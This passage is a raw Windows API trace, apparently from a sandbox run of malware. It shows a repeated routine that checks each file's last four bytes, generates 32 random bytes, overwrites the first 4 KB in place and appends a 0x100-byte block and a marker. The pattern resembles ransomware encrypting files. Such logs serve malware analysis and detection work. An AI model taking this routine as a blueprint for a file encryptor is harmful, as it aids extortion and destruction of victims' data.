[0085.483] GetProcessHeap () returned 0x4f10000 [0085.483] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.483] GetProcessHeap () returned 0x4f10000 [0085.483] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.483] GetProcessHeap () returned 0x4f10000 [0085.483] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.483] GetProcessHeap () returned 0x4f10000 [0085.483] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.483] GetProcessHeap () returned 0x4f10000 [0085.483] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.483] GetProcessHeap () returned 0x4f10000 [0085.483] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.483] GetProcessHeap () returned 0x4f10000 [0085.483] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.483] GetProcessHeap () returned 0x4f10000 [0085.483] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.483] GetProcessHeap () returned 0x4f10000 [0085.483] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.483] GetProcessHeap () returned 0x4f10000 [0085.483] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.483] GetProcessHeap () returned 0x4f10000 [0085.483] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.484] GetProcessHeap () returned 0x4f10000 [0085.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.484] GetProcessHeap () returned 0x4f10000 [0085.484] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.484] GetProcessHeap () returned 0x4f10000 [0085.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.484] GetProcessHeap () returned 0x4f10000 [0085.484] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.484] GetProcessHeap () returned 0x4f10000 [0085.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.484] GetProcessHeap () returned 0x4f10000 [0085.484] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.484] GetProcessHeap () returned 0x4f10000 [0085.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.484] GetProcessHeap () returned 0x4f10000 [0085.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.484] GetProcessHeap () returned 0x4f10000 [0085.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0085.484] GetProcessHeap () returned 0x4f10000 [0085.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.484] GetProcessHeap () returned 0x4f10000 [0085.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.484] SetFilePointerEx (in: hFile=0x9c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.484] WriteFile (in: hFile=0x9c4, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.485] WriteFile (in: hFile=0x9c4, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.485] GetProcessHeap () returned 0x4f10000 [0085.485] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.485] GetProcessHeap () returned 0x4f10000 [0085.485] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.485] GetProcessHeap () returned 0x4f10000 [0085.485] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.485] CloseHandle (hObject=0x9c4) returned 1 [0085.486] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 147 [0085.487] SetFilePointerEx (in: hFile=0x9c8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.487] ReadFile (in: hFile=0x9c8, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.487] SetFilePointerEx (in: hFile=0x9c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.487] GetProcessHeap () returned 0x4f10000 [0085.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.487] GetProcessHeap () returned 0x4f10000 [0085.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.487] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.487] GetProcessHeap () returned 0x4f10000 [0085.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.487] ReadFile (in: hFile=0x9c8, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0085.535] SetFilePointerEx (in: hFile=0x9c8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.535] WriteFile (in: hFile=0x9c8, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0085.535] GetProcessHeap () returned 0x4f10000 [0085.535] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.535] GetProcessHeap () returned 0x4f10000 [0085.535] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.535] GetProcessHeap () returned 0x4f10000 [0085.535] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.535] GetProcessHeap () returned 0x4f10000 [0085.535] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.535] GetProcessHeap () returned 0x4f10000 [0085.535] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.535] GetProcessHeap () returned 0x4f10000 [0085.535] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.535] GetProcessHeap () returned 0x4f10000 [0085.535] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.535] GetProcessHeap () returned 0x4f10000 [0085.535] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.535] GetProcessHeap () returned 0x4f10000 [0085.535] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.535] GetProcessHeap () returned 0x4f10000 [0085.535] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.536] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.536] GetProcessHeap () returned 0x4f10000 [0085.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.537] GetProcessHeap () returned 0x4f10000 [0085.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.538] GetProcessHeap () returned 0x4f10000 [0085.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.538] GetProcessHeap () returned 0x4f10000 [0085.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.538] GetProcessHeap () returned 0x4f10000 [0085.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.538] GetProcessHeap () returned 0x4f10000 [0085.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.538] GetProcessHeap () returned 0x4f10000 [0085.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.538] GetProcessHeap () returned 0x4f10000 [0085.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.538] GetProcessHeap () returned 0x4f10000 [0085.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.538] GetProcessHeap () returned 0x4f10000 [0085.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.538] GetProcessHeap () returned 0x4f10000 [0085.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.538] GetProcessHeap () returned 0x4f10000 [0085.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.538] GetProcessHeap () returned 0x4f10000 [0085.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.538] GetProcessHeap () returned 0x4f10000 [0085.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.538] GetProcessHeap () returned 0x4f10000 [0085.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.538] GetProcessHeap () returned 0x4f10000 [0085.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.539] GetProcessHeap () returned 0x4f10000 [0085.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.539] GetProcessHeap () returned 0x4f10000 [0085.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.539] GetProcessHeap () returned 0x4f10000 [0085.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.539] GetProcessHeap () returned 0x4f10000 [0085.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.539] GetProcessHeap () returned 0x4f10000 [0085.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.539] GetProcessHeap () returned 0x4f10000 [0085.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.539] GetProcessHeap () returned 0x4f10000 [0085.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.539] GetProcessHeap () returned 0x4f10000 [0085.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.539] GetProcessHeap () returned 0x4f10000 [0085.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.539] GetProcessHeap () returned 0x4f10000 [0085.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.539] GetProcessHeap () returned 0x4f10000 [0085.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.539] GetProcessHeap () returned 0x4f10000 [0085.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.539] GetProcessHeap () returned 0x4f10000 [0085.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.539] GetProcessHeap () returned 0x4f10000 [0085.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.539] GetProcessHeap () returned 0x4f10000 [0085.540] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0085.540] GetProcessHeap () returned 0x4f10000 [0085.540] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.540] GetProcessHeap () returned 0x4f10000 [0085.540] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.540] SetFilePointerEx (in: hFile=0x9c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.540] WriteFile (in: hFile=0x9c8, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.540] WriteFile (in: hFile=0x9c8, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.540] GetProcessHeap () returned 0x4f10000 [0085.540] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.540] GetProcessHeap () returned 0x4f10000 [0085.540] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.540] GetProcessHeap () returned 0x4f10000 [0085.540] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.540] CloseHandle (hObject=0x9c8) returned 1 [0085.541] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 148 [0085.542] SetFilePointerEx (in: hFile=0x9cc, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.542] ReadFile (in: hFile=0x9cc, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.542] SetFilePointerEx (in: hFile=0x9cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.542] GetProcessHeap () returned 0x4f10000 [0085.542] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.542] GetProcessHeap () returned 0x4f10000 [0085.542] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.542] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.542] GetProcessHeap () returned 0x4f10000 [0085.542] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.542] ReadFile (in: hFile=0x9cc, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0085.604] SetFilePointerEx (in: hFile=0x9cc, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.605] WriteFile (in: hFile=0x9cc, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0085.605] GetProcessHeap () returned 0x4f10000 [0085.605] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.605] GetProcessHeap () returned 0x4f10000 [0085.605] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.605] GetProcessHeap () returned 0x4f10000 [0085.605] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.605] GetProcessHeap () returned 0x4f10000 [0085.605] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.605] GetProcessHeap () returned 0x4f10000 [0085.605] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.605] GetProcessHeap () returned 0x4f10000 [0085.605] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.605] GetProcessHeap () returned 0x4f10000 [0085.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.606] GetProcessHeap () returned 0x4f10000 [0085.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: 